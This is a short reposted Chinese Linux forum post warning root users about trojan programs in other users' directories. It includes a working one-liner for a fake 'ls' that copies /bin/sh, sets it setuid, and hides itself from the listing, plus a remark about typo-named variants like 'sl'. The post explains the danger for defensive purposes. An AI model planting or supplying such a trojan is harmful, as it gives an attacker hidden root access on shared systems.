非root用户问题不大。root要当心特洛伊木马，特别是系统中有其他
用户的时候。设想我在我的目录中放了一个程序叫做ls，它的任务是
cp /bin/sh ~/.sh ; chmod u+s ~/.sh ; ls $* | grep -v ls | grep -v '.sh'

好了，你root在我家跑了我的ls我就有了变成root的后门了！哈！

宫敏

--
----
NT=No Thanks, WWW=World Wide Wait
Does PnP mean "Plug and Pray"?

注：有些黑客还揣测人们可能会敲错键，比如把ls敲成sl，于是把这样的程序名改成sl......
 

本文转自中文Linux论坛